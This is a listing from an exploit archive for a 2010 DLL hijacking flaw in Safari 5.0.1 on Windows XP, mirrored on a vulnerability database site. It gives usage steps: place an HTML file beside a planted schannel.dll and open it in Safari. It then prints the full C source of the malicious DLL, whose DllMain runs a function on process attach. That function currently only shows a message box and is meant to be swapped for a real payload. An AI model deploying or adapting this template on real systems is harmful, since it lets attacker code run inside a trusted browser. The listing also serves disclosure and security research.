Lucene search
K

Safari v5.0.1 DLL Hijacking (schannel.dll) Exploit

🗓️ 09 Sep 2010 00:00:00Reported by Adrabi AbderrahimType 
zdt
 zdt
🔗 0day.today👁 14 Views

Exploit for Safari v5.0.1 DLL Hijacking (schannel.dll

Code
==================================================
Safari v5.0.1 DLL Hijacking (schannel.dll) Exploit
==================================================

Version: Safari 5.0.1
Tested on: Windows XP SP2
Author : Adrabi Abderrahim (Just Another Ghost In The Shell)
Note : This file has been generated by Hij4c0r Project more info visite
	http://launchpad.net/hij4c0r.

Place a .html and schannel.dll in same folder and run file in safari.

Code for schannel.dll (original generated source file):

/**
 * Author: <Your Name/Nick>
 * E-Maill: <Your Mail>
 * Description: <Your Description>
 * Note : This file has been generated by Hij4c0r Project (remove this note is you want ^_^).
 */

#include <windows.h>
#define DLLIMPORT __declspec(dllexport)

void hij4c0r()
{
    //DON'T CHANGE THIS LINE
    MessageBox(NULL, "schannel.dll" , "DLL" , MB_ICONINFORMATION);
}

DLLIMPORT void hook_startup()
{
    hij4c0r();
}

BOOL APIENTRY DllMain(HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		hij4c0r();
		break;
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}



#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Sep 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8
14